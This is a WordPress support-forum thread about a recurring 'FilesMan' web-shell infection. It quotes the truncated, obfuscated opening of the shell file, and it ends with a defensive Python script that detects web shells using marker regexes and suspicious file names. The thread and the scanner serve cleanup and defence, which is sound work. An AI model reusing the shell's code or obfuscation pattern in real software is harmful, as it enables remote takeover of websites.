• Hi

    I’ve found an infected file on one of my client websites. The file is wp-content/uploads/wp-cron.php and the file begins with the following code:

    <?php # Web Shell by oRb
    $auth_pass = “bdfa762517dbee605ddea6ac0205b3ec”;
    $color = “#df5”;
    $default_action = ‘FilesMan’;
    $default_use_ajax = true;
    $default_charset = ‘Windows-1251’;
    preg_replace(“/.*/e”,”\x65\x7……

    I’ve followed all the advice I could find online. I can’t find any base64_decode script and this is the only instance there is on my server.

    I’ve changed all passwords, installed BulletProof security but this file just keeps coming back every time I delete it!

    None of my other client sites seem to have been infected.

    Tearing my hair out!! Any advice gratefully received!

Viewing 2 replies - 1 through 2 (of 2 total)
  • I found the same thing. I think it came from the WP-Symposium plugin, but I can’t be sure. I’m terrified it might have come from a plugin I wrote — DrawBlog — but in any case, I’m ripping out files that were modified around the date of the initial installation of this file.

    I’m finding a ton of files named “security.php” and “footer_front_page.php” — them’s bad news.

    Oops – I want to be notified of any replies here. Checking the little box now.

  • The topic ‘Filesman hack’ is closed to new replies.
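
A read-only triage sketch for the cleanup discussed in this thread, added here as an example and not code from either poster. It flags `.php` files that carry the markers quoted in the first post, any PHP file under an uploads directory, and the two file names the reply reports, and it lists files modified close to a reference file's timestamp. The function names, regexes, 64 KiB read limit and two-day window are assumptions of this example.

```python
import re
import sys
from pathlib import Path

# Markers quoted in the thread; the regexes are this example's own heuristics.
CONTENT_RULES = {
    "preg_replace with /e (eval) modifier": re.compile(
        rb"preg_replace\s*\(\s*([\"'])(\W)(?:(?!\1).)*?\2[a-zA-Z]*e[a-zA-Z]*\1"),
    "$auth_pass assignment": re.compile(rb"\$auth_pass\s*="),
    "FilesMan marker": re.compile(rb"FilesMan"),
}
NAMES_FROM_THREAD = {"security.php", "footer_front_page.php"}


def scan(root):
    """Return {relative path: [reasons]} for each suspicious .php file under root."""
    root, findings = Path(root), {}
    for path in sorted(p for p in root.rglob("*.php") if p.is_file()):
        rel = path.relative_to(root)
        head = path.read_bytes()[:65536]  # the quoted markers sit at the top of the file
        reasons = [why for why, rx in CONTENT_RULES.items() if rx.search(head)]
        if "uploads" in rel.parts[:-1]:
            reasons.append("PHP file inside an uploads directory")
        if path.name in NAMES_FROM_THREAD:
            reasons.append("file name reported in the thread; confirm by content")
        if reasons:
            findings[rel.as_posix()] = reasons
    return findings


def modified_near(root, reference, window_days=2):
    """List files whose mtime is within window_days of the reference file's mtime."""
    root = Path(root)
    ref = (root / reference).stat().st_mtime
    return sorted(p.relative_to(root).as_posix() for p in root.rglob("*")
                  if p.is_file() and abs(p.stat().st_mtime - ref) <= window_days * 86400)


if __name__ == "__main__":  # usage: script.py SITE_ROOT [REFERENCE_FILE]
    target = sys.argv[1] if len(sys.argv) > 1 else "."
    for rel, why in scan(target).items():
        print(rel, "->", "; ".join(why))
    if len(sys.argv) > 2:
        print("modified near reference:", modified_near(target, sys.argv[2]))
```

A file-name match alone is weak evidence, since legitimate plugins may ship files with the same names, and modification times can be altered, so the time window narrows a review rather than proving a file clean.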